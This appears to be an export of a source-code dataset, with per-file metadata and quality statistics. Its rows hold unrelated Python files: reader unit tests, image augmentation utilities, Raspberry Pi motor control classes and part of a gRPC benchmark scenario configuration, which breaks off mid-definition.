hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
75a4bb9fdee748c40195051c6c8f951f1adbfc5a
| 1,615
|
py
|
Python
|
tests/test_reader_base.py
|
po2xel/mootdx
|
aaa7114891e77445f2acfaf76a71d66070a18177
|
[
"MIT"
] | 88
|
2021-06-29T03:18:13.000Z
|
2022-03-30T12:28:28.000Z
|
tests/test_reader_base.py
|
po2xel/mootdx
|
aaa7114891e77445f2acfaf76a71d66070a18177
|
[
"MIT"
] | 9
|
2021-10-02T14:00:19.000Z
|
2022-03-21T02:10:19.000Z
|
tests/test_reader_base.py
|
po2xel/mootdx
|
aaa7114891e77445f2acfaf76a71d66070a18177
|
[
"MIT"
] | 48
|
2021-07-22T04:24:08.000Z
|
2022-03-26T01:10:47.000Z
|
import unittest
from mootdx.reader import ReaderBase
class TestReaderBase(unittest.TestCase):
def test_find_path(self):
reader = ReaderBase('../fixtures')
result = reader.find_path(symbol='sh000001', subdir='minline', suffix=['lc1', '1'], debug=True)
assert ('sh', 'sh000001', ['lc1', '1']) == result, result
def test_find_path2(self):
reader = ReaderBase('../fixtures')
result = reader.find_path(symbol='000001', subdir='minline', suffix=['lc1', '1'], debug=True)
assert ('sz', 'sz000001', ['lc1', '1']) == result, result
def test_find_path3(self):
reader = ReaderBase('../fixtures')
result = reader.find_path(symbol='34#000001', subdir='minline', suffix=['lc1', '1'], debug=True)
assert ('ds', '34#000001', ['lc1', '1']) == result, result
def test_find_path4(self):
reader = ReaderBase('../fixtures')
result = reader.find_path(symbol='sh000001', subdir='minline', suffix=['lc1', '1'], debug=True)
assert ('sh', 'sh000001', ['lc1', '1']) == result, result
def test_find_path5(self):
reader = ReaderBase('../fixtures')
result = reader.find_path(symbol='SH000001', subdir='minline', suffix=['lc1', '1'], debug=True)
assert ('sh', 'sh000001', ['lc1', '1']) == result, result
def test_find_path6(self):
reader = ReaderBase('../fixtures')
result = reader.find_path(symbol='sz000001', subdir='minline', suffix=['lc1', '1'], debug=True)
assert ('sz', 'sz000001', ['lc1', '1']) == result, result
if __name__ == '__main__':
unittest.main()
| 39.390244
| 104
| 0.605573
| 186
| 1,615
| 5.11828
| 0.215054
| 0.05042
| 0.069328
| 0.176471
| 0.828782
| 0.828782
| 0.828782
| 0.788866
| 0.788866
| 0.566176
| 0
| 0.080831
| 0.195666
| 1,615
| 40
| 105
| 40.375
| 0.65204
| 0
| 0
| 0.448276
| 0
| 0
| 0.168421
| 0
| 0
| 0
| 0
| 0
| 0.206897
| 1
| 0.206897
| false
| 0
| 0.068966
| 0
| 0.310345
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
75b540b9a28ad2275717a4a5217b09736253a7d7
| 106
|
py
|
Python
|
boundfield_renderer/registries/__init__.py
|
bmampaey/django-form-renderer
|
b56eecb16bb8f7a47667aec8baf1ffcc0cd5b776
|
[
"MIT"
] | 1
|
2020-10-09T15:27:47.000Z
|
2020-10-09T15:27:47.000Z
|
boundfield_renderer/registries/__init__.py
|
bmampaey/django-form-renderer
|
b56eecb16bb8f7a47667aec8baf1ffcc0cd5b776
|
[
"MIT"
] | null | null | null |
boundfield_renderer/registries/__init__.py
|
bmampaey/django-form-renderer
|
b56eecb16bb8f7a47667aec8baf1ffcc0cd5b776
|
[
"MIT"
] | null | null | null |
from .default import renderer_registry as default
from .bootstrap4 import renderer_registry as bootstrap4
| 35.333333
| 55
| 0.867925
| 14
| 106
| 6.428571
| 0.5
| 0.311111
| 0.488889
| 0.533333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.021277
| 0.113208
| 106
| 2
| 56
| 53
| 0.93617
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
75ee030bd41db064f1fd3423be3e2ddea2b4f281
| 7,951
|
py
|
Python
|
datasets/augmentation.py
|
HanHuCAS/DR-UDA
|
46691fe9e6703ad796572ed8dc9dc07a34714576
|
[
"Apache-2.0"
] | 9
|
2021-08-16T15:34:44.000Z
|
2021-12-13T03:36:05.000Z
|
datasets/augmentation.py
|
HanHuCAS/DR-UDA
|
46691fe9e6703ad796572ed8dc9dc07a34714576
|
[
"Apache-2.0"
] | 1
|
2021-11-23T07:26:30.000Z
|
2021-11-23T07:26:30.000Z
|
datasets/augmentation.py
|
HanHuCAS/DR-UDA
|
46691fe9e6703ad796572ed8dc9dc07a34714576
|
[
"Apache-2.0"
] | 2
|
2021-11-10T03:06:35.000Z
|
2021-12-13T05:14:50.000Z
|
from imgaug import augmenters as iaa
import math
import cv2
from datasets.data_helper import *
def random_cropping(image, target_shape=(32, 32, 3), is_random = True):
image = cv2.resize(image,(RESIZE_SIZE,RESIZE_SIZE))
target_h, target_w,_ = target_shape
height, width, _ = image.shape
if is_random:
start_x = random.randint(0, width - target_w)
start_y = random.randint(0, height - target_h)
else:
start_x = ( width - target_w ) // 2
start_y = ( height - target_h ) // 2
zeros = image[start_y:start_y+target_h,start_x:start_x+target_w,:]
return zeros
def TTA_5_cropps(image, target_shape=(32, 32, 3)):
image = cv2.resize(image, (RESIZE_SIZE, RESIZE_SIZE))
width, height, d = image.shape
target_w, target_h, d = target_shape
start_x = ( width - target_w) // 2
start_y = ( height - target_h) // 2
starts = [[start_x, start_y],
[start_x - target_w, start_y],
[start_x, start_y - target_w],
[start_x + target_w, start_y],
[start_x, start_y + target_w],]
images = []
for start_index in starts:
image_ = image.copy()
x, y = start_index
if x < 0:
x = 0
if y < 0:
y = 0
if x + target_w >= RESIZE_SIZE:
x = RESIZE_SIZE - target_w-1
if y + target_h >= RESIZE_SIZE:
y = RESIZE_SIZE - target_h-1
zeros = image_[x:x + target_w, y: y+target_h, :]
image_ = zeros.copy()
images.append(image_.reshape([1,target_shape[0],target_shape[1],target_shape[2]]))
return images
def TTA_18_cropps(image, target_shape=(32, 32, 3)):
image = cv2.resize(image, (RESIZE_SIZE, RESIZE_SIZE))
width, height, d = image.shape
target_w, target_h, d = target_shape
start_x = ( width - target_w) // 2
start_y = ( height - target_h) // 2
starts = [[start_x, start_y],
[start_x - target_w, start_y],
[start_x, start_y - target_w],
[start_x + target_w, start_y],
[start_x, start_y + target_w],
[start_x + target_w, start_y + target_w],
[start_x - target_w, start_y - target_w],
[start_x - target_w, start_y + target_w],
[start_x + target_w, start_y - target_w],
]
images = []
for start_index in starts:
image_ = image.copy()
x, y = start_index
if x < 0:
x = 0
if y < 0:
y = 0
if x + target_w >= RESIZE_SIZE:
x = RESIZE_SIZE - target_w-1
if y + target_h >= RESIZE_SIZE:
y = RESIZE_SIZE - target_h-1
zeros = image_[x:x + target_w, y: y+target_h, :]
image_ = zeros.copy()
zeros = np.fliplr(zeros)
image_flip = zeros.copy()
images.append(image_.reshape([1,target_shape[0],target_shape[1],target_shape[2]]))
images.append(image_flip.reshape([1,target_shape[0],target_shape[1],target_shape[2]]))
return images
def TTA_36_cropps(image, target_shape=(32, 32, 3)):
image = cv2.resize(image, (RESIZE_SIZE, RESIZE_SIZE))
width, height, d = image.shape
target_w, target_h, d = target_shape
start_x = ( width - target_w) // 2
start_y = ( height - target_h) // 2
starts = [[start_x, start_y],
[start_x - target_w, start_y],
[start_x, start_y - target_w],
[start_x + target_w, start_y],
[start_x, start_y + target_w],
[start_x + target_w, start_y + target_w],
[start_x - target_w, start_y - target_w],
[start_x - target_w, start_y + target_w],
[start_x + target_w, start_y - target_w],
]
images = []
for start_index in starts:
image_ = image.copy()
x, y = start_index
if x < 0:
x = 0
if y < 0:
y = 0
if x + target_w >= RESIZE_SIZE:
x = RESIZE_SIZE - target_w-1
if y + target_h >= RESIZE_SIZE:
y = RESIZE_SIZE - target_h-1
zeros = image_[x:x + target_w, y: y+target_h, :]
image_ = zeros.copy()
zeros = np.fliplr(zeros)
image_flip_lr = zeros.copy()
zeros = np.flipud(zeros)
image_flip_lr_up = zeros.copy()
zeros = np.fliplr(zeros)
image_flip_up = zeros.copy()
images.append(image_.reshape([1,target_shape[0],target_shape[1],target_shape[2]]))
images.append(image_flip_lr.reshape([1,target_shape[0],target_shape[1],target_shape[2]]))
images.append(image_flip_up.reshape([1,target_shape[0],target_shape[1],target_shape[2]]))
images.append(image_flip_lr_up.reshape([1,target_shape[0],target_shape[1],target_shape[2]]))
return images
def random_erasing(img, probability = 0.5, sl = 0.02, sh = 0.5, r1 = 0.5, channel = 3):
if random.uniform(0, 1) > probability:
return img
for attempt in range(100):
area = img.shape[0] * img.shape[1]
target_area = random.uniform(sl, sh) * area
aspect_ratio = random.uniform(r1, 1 / r1)
h = int(round(math.sqrt(target_area * aspect_ratio)))
w = int(round(math.sqrt(target_area / aspect_ratio)))
if w < img.shape[1] and h < img.shape[0]:
x1 = random.randint(0, img.shape[0] - h)
y1 = random.randint(0, img.shape[1] - w)
noise = np.random.random((h,w,channel))*255
noise = noise.astype(np.uint8)
if img.shape[2] == channel:
img[x1:x1 + h, y1:y1 + w, :] = noise
else:
print('wrong')
return
return img
return img
def random_resize(img, probability = 0.5, minRatio = 0.7):
if random.uniform(0, 1) > probability:
return img
ratio = random.uniform(minRatio, 1.0)
h = img.shape[0]
w = img.shape[1]
new_h = int(h*ratio)
new_w = int(w*ratio)
img = cv2.resize(img, (new_w,new_h))
img = cv2.resize(img, (w, h))
return img
def train_augumentor(image):
augment_img = iaa.Sequential([
iaa.Fliplr(0.5),
iaa.Flipud(0.5),
iaa.Affine(rotate=(-30, 30)),
], random_order=True)
image = augment_img.augment_image(image)
image = random_resize(image)
# image = random_cropping(image, target_shape, is_random=True)
return image
def test_augumentor(image):
augment_img = iaa.Sequential([
iaa.Fliplr(0),
])
image = augment_img.augment_image(image)
# image = TTA_36_cropps(image, target_shape)
return image
def depth_augumentor(image, target_shape=(32, 32, 3), is_infer=False):
if is_infer:
augment_img = iaa.Sequential([
iaa.Fliplr(0),
])
image = augment_img.augment_image(image)
image = TTA_36_cropps(image, target_shape)
return image
else:
augment_img = iaa.Sequential([
iaa.Fliplr(0.5),
iaa.Flipud(0.5),
iaa.Affine(rotate=(-30, 30)),
], random_order=True)
image = augment_img.augment_image(image)
image = random_resize(image)
image = random_cropping(image, target_shape, is_random=True)
return image
def ir_augumentor(image, target_shape=(32, 32, 3), is_infer=False):
if is_infer:
augment_img = iaa.Sequential([
iaa.Fliplr(0),
])
image = augment_img.augment_image(image)
image = TTA_36_cropps(image, target_shape)
return image
else:
augment_img = iaa.Sequential([
iaa.Fliplr(0.5),
iaa.Flipud(0.5),
iaa.Affine(rotate=(-30, 30)),
], random_order=True)
image = augment_img.augment_image(image)
image = random_resize(image)
image = random_cropping(image, target_shape, is_random=True)
return image
| 29.018248
| 100
| 0.57628
| 1,115
| 7,951
| 3.853812
| 0.090583
| 0.076565
| 0.072609
| 0.045381
| 0.807075
| 0.793577
| 0.793111
| 0.787759
| 0.735862
| 0.728881
| 0
| 0.032229
| 0.301472
| 7,951
| 273
| 101
| 29.124542
| 0.741448
| 0.012954
| 0
| 0.727723
| 0
| 0
| 0.000637
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.049505
| false
| 0
| 0.019802
| 0
| 0.143564
| 0.004951
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f9408e452d897b9a43f9bfc1b4c820661179a664
| 2,343
|
py
|
Python
|
Motor Scripts/motorfunctions.py
|
Abtaha/AISS
|
2824598db03659472b061c381fee20d38b4bce2e
|
[
"MIT"
] | null | null | null |
Motor Scripts/motorfunctions.py
|
Abtaha/AISS
|
2824598db03659472b061c381fee20d38b4bce2e
|
[
"MIT"
] | null | null | null |
Motor Scripts/motorfunctions.py
|
Abtaha/AISS
|
2824598db03659472b061c381fee20d38b4bce2e
|
[
"MIT"
] | null | null | null |
class motor1:
def setup(self):
import RPi.GPIO as GPIO
import time
GPIO.setmode(GPIO.BOARD)
GPIO.setup(7, GPIO.OUT)
GPIO.setup(5, GPIO.OUT)
GPIO.output(5, GPIO.LOW)
def step(self,_):
import RPi.GPIO as GPIO
import time
GPIO.output(7, GPIO.LOW)
time.sleep(_)
GPIO.output(7, GPIO.HIGH)
time.sleep(_)
def dir(self,_):
import RPi.GPIO as GPIO
if _ == 0:
GPIO.setup(3, GPIO.OUT)
GPIO.output(3, GPIO.HIGH)
else:
GPIO.setup(3, GPIO.OUT)
GPIO.output(3, GPIO.LOW)
def enable(self,_):
import RPi.GPIO as GPIO
if _ == 0:
GPIO.setup(5, GPIO.OUT)
GPIO.output(5, GPIO.HIGH)
else:
GPIO.setup(5, GPIO.OUT)
GPIO.output(5, GPIO.LOW)
class motor2:
def setup(self):
import RPi.GPIO as GPIO
import time
GPIO.setmode(GPIO.BOARD)
GPIO.setup(12, GPIO.OUT)
GPIO.setup(10, GPIO.OUT)
GPIO.output(10, GPIO.LOW)
def step(self,_):
import RPi.GPIO as GPIO
import time
GPIO.output(12, GPIO.LOW)
time.sleep(_)
GPIO.output(12, GPIO.HIGH)
time.sleep(_)
def dir(self,_):
import RPi.GPIO as GPIO
if _ == 0:
GPIO.setup(8, GPIO.OUT)
GPIO.output(8, GPIO.HIGH)
else:
GPIO.setup(8, GPIO.OUT)
GPIO.output(8, GPIO.LOW)
def enable(self,_):
import RPi.GPIO as GPIO
if _ == 0:
GPIO.setup(10, GPIO.OUT)
GPIO.output(10, GPIO.HIGH)
else:
GPIO.setup(10, GPIO.OUT)
GPIO.output(10, GPIO.LOW)
| 33
| 51
| 0.381989
| 234
| 2,343
| 3.764957
| 0.128205
| 0.15891
| 0.14983
| 0.192963
| 0.948922
| 0.912599
| 0.853575
| 0.853575
| 0.853575
| 0.683314
| 0
| 0.037239
| 0.53009
| 2,343
| 70
| 52
| 33.471429
| 0.762943
| 0
| 0
| 0.774194
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.129032
| false
| 0
| 0.193548
| 0
| 0.354839
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
ddbe2375691b01f21890b71891eb98d18825769a
| 21,047
|
py
|
Python
|
tools/run_tests/performance/scenario_config.py
|
engineer-legion/grpc
|
b75f5571e8c27da5ccbde298e323b515580b80cc
|
[
"BSD-3-Clause"
] | null | null | null |
tools/run_tests/performance/scenario_config.py
|
engineer-legion/grpc
|
b75f5571e8c27da5ccbde298e323b515580b80cc
|
[
"BSD-3-Clause"
] | null | null | null |
tools/run_tests/performance/scenario_config.py
|
engineer-legion/grpc
|
b75f5571e8c27da5ccbde298e323b515580b80cc
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright 2016, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# performance scenario configuration for various languages
SINGLE_MACHINE_CORES=8
WARMUP_SECONDS=5
JAVA_WARMUP_SECONDS=15 # Java needs more warmup time for JIT to kick in.
BENCHMARK_SECONDS=30
SECURE_SECARGS = {'use_test_ca': True,
'server_host_override': 'foo.test.google.fr'}
HISTOGRAM_PARAMS = {
'resolution': 0.01,
'max_possible': 60e9,
}
EMPTY_GENERIC_PAYLOAD = {
'bytebuf_params': {
'req_size': 0,
'resp_size': 0,
}
}
EMPTY_PROTO_PAYLOAD = {
'simple_params': {
'req_size': 0,
'resp_size': 0,
}
}
BIG_GENERIC_PAYLOAD = {
'bytebuf_params': {
'req_size': 65536,
'resp_size': 65536,
}
}
# deep is the number of RPCs outstanding on a channel in non-ping-pong tests
# (the value used is 1 otherwise)
DEEP=100
# wide is the number of client channels in multi-channel tests (1 otherwise)
WIDE=64
class CXXLanguage:
def __init__(self):
self.safename = 'cxx'
def worker_cmdline(self):
return ['bins/opt/qps_worker']
def worker_port_offset(self):
return 0
def scenarios(self):
# TODO(ctiller): add 70% load latency test
for secure in [True, False]:
if secure:
secstr = 'secure'
secargs = SECURE_SECARGS
else:
secstr = 'insecure'
secargs = None
yield {
'name': 'cpp_generic_async_streaming_ping_pong_%s'
% secstr,
'num_servers': 1,
'num_clients': 1,
'client_config': {
'client_type': 'ASYNC_CLIENT',
'security_params': secargs,
'outstanding_rpcs_per_channel': 1,
'client_channels': 1,
'async_client_threads': 1,
'rpc_type': 'STREAMING',
'load_params': {
'closed_loop': {}
},
'payload_config': EMPTY_GENERIC_PAYLOAD,
'histogram_params': HISTOGRAM_PARAMS,
},
'server_config': {
'server_type': 'ASYNC_GENERIC_SERVER',
'security_params': secargs,
'core_limit': 1,
'async_server_threads': 1,
'payload_config': EMPTY_GENERIC_PAYLOAD,
},
'warmup_seconds': WARMUP_SECONDS,
'benchmark_seconds': BENCHMARK_SECONDS
}
yield {
'name': 'cpp_generic_async_streaming_qps_unconstrained_%s'
% secstr,
'num_servers': 1,
'num_clients': 0,
'client_config': {
'client_type': 'ASYNC_CLIENT',
'security_params': secargs,
'outstanding_rpcs_per_channel': DEEP,
'client_channels': WIDE,
'async_client_threads': 0,
'rpc_type': 'STREAMING',
'load_params': {
'closed_loop': {}
},
'payload_config': EMPTY_GENERIC_PAYLOAD,
'histogram_params': HISTOGRAM_PARAMS,
},
'server_config': {
'server_type': 'ASYNC_GENERIC_SERVER',
'security_params': secargs,
'core_limit': SINGLE_MACHINE_CORES/2,
'async_server_threads': 0,
'payload_config': EMPTY_GENERIC_PAYLOAD,
},
'warmup_seconds': WARMUP_SECONDS,
'benchmark_seconds': BENCHMARK_SECONDS
}
yield {
'name': 'cpp_generic_async_streaming_qps_one_server_core_%s'
% secstr,
'num_servers': 1,
'num_clients': 0,
'client_config': {
'client_type': 'ASYNC_CLIENT',
'security_params': secargs,
'outstanding_rpcs_per_channel': DEEP,
'client_channels': WIDE,
'async_client_threads': 0,
'rpc_type': 'STREAMING',
'load_params': {
'closed_loop': {}
},
'payload_config': EMPTY_GENERIC_PAYLOAD,
'histogram_params': HISTOGRAM_PARAMS,
},
'server_config': {
'server_type': 'ASYNC_GENERIC_SERVER',
'security_params': secargs,
'core_limit': 1,
'async_server_threads': 1,
'payload_config': EMPTY_GENERIC_PAYLOAD,
},
'warmup_seconds': WARMUP_SECONDS,
'benchmark_seconds': BENCHMARK_SECONDS
}
yield {
'name': 'cpp_protobuf_async_streaming_qps_unconstrained_%s'
% secstr,
'num_servers': 1,
'num_clients': 0,
'client_config': {
'client_type': 'ASYNC_CLIENT',
'security_params': secargs,
'outstanding_rpcs_per_channel': DEEP,
'client_channels': WIDE,
'async_client_threads': 0,
'rpc_type': 'STREAMING',
'load_params': {
'closed_loop': {}
},
'payload_config': EMPTY_PROTO_PAYLOAD,
'histogram_params': HISTOGRAM_PARAMS,
},
'server_config': {
'server_type': 'ASYNC_SERVER',
'security_params': secargs,
'core_limit': SINGLE_MACHINE_CORES/2,
'async_server_threads': 0,
},
'warmup_seconds': WARMUP_SECONDS,
'benchmark_seconds': BENCHMARK_SECONDS
}
yield {
'name': 'cpp_protobuf_async_streaming_ping_pong_%s'
% secstr,
'num_servers': 1,
'num_clients': 1,
'client_config': {
'client_type': 'ASYNC_CLIENT',
'security_params': secargs,
'outstanding_rpcs_per_channel': 1,
'client_channels': 1,
'async_client_threads': 1,
'rpc_type': 'STREAMING',
'load_params': {
'closed_loop': {}
},
'payload_config': EMPTY_PROTO_PAYLOAD,
'histogram_params': HISTOGRAM_PARAMS,
},
'server_config': {
'server_type': 'ASYNC_SERVER',
'security_params': secargs,
'core_limit': 1,
'async_server_threads': 1,
},
'warmup_seconds': WARMUP_SECONDS,
'benchmark_seconds': BENCHMARK_SECONDS
}
yield {
'name': 'cpp_protobuf_sync_unary_ping_pong_%s'
% secstr,
'num_servers': 1,
'num_clients': 1,
'client_config': {
'client_type': 'SYNC_CLIENT',
'security_params': secargs,
'outstanding_rpcs_per_channel': 1,
'client_channels': 1,
'async_client_threads': 0,
'rpc_type': 'UNARY',
'load_params': {
'closed_loop': {}
},
'payload_config': EMPTY_PROTO_PAYLOAD,
'histogram_params': HISTOGRAM_PARAMS,
},
'server_config': {
'server_type': 'SYNC_SERVER',
'security_params': secargs,
'core_limit': 1,
'async_server_threads': 0,
},
'warmup_seconds': WARMUP_SECONDS,
'benchmark_seconds': BENCHMARK_SECONDS
}
yield {
'name': 'cpp_protobuf_async_unary_ping_pong_%s'
% secstr,
'num_servers': 1,
'num_clients': 1,
'client_config': {
'client_type': 'ASYNC_CLIENT',
'security_params': secargs,
'outstanding_rpcs_per_channel': 1,
'client_channels': 1,
'async_client_threads': 1,
'rpc_type': 'UNARY',
'load_params': {
'closed_loop': {}
},
'payload_config': EMPTY_PROTO_PAYLOAD,
'histogram_params': HISTOGRAM_PARAMS,
},
'server_config': {
'server_type': 'ASYNC_SERVER',
'security_params': secargs,
'core_limit': 1,
'async_server_threads': 1,
},
'warmup_seconds': WARMUP_SECONDS,
'benchmark_seconds': BENCHMARK_SECONDS
}
def __str__(self):
return 'c++'
class CSharpLanguage:
def __init__(self):
self.safename = str(self)
def worker_cmdline(self):
return ['tools/run_tests/performance/run_worker_csharp.sh']
def worker_port_offset(self):
return 100
def scenarios(self):
secargs = SECURE_SECARGS
yield {
'name': 'csharp_generic_async_streaming_ping_pong',
'num_servers': 1,
'num_clients': 1,
'client_config': {
'client_type': 'ASYNC_CLIENT',
'security_params': secargs,
'outstanding_rpcs_per_channel': 1,
'client_channels': 1,
'async_client_threads': 1,
'rpc_type': 'STREAMING',
'load_params': {
'closed_loop': {}
},
'payload_config': EMPTY_GENERIC_PAYLOAD,
'histogram_params': HISTOGRAM_PARAMS,
},
'server_config': {
'server_type': 'ASYNC_GENERIC_SERVER',
'security_params': secargs,
'core_limit': 0,
'async_server_threads': 0,
'payload_config': EMPTY_GENERIC_PAYLOAD,
},
'warmup_seconds': WARMUP_SECONDS,
'benchmark_seconds': BENCHMARK_SECONDS
}
yield {
'name': 'csharp_protobuf_async_unary_ping_pong',
'num_servers': 1,
'num_clients': 1,
'client_config': {
'client_type': 'ASYNC_CLIENT',
'security_params': secargs,
'outstanding_rpcs_per_channel': 1,
'client_channels': 1,
'async_client_threads': 1,
'rpc_type': 'UNARY',
'load_params': {
'closed_loop': {}
},
'payload_config': EMPTY_PROTO_PAYLOAD,
'histogram_params': HISTOGRAM_PARAMS,
},
'server_config': {
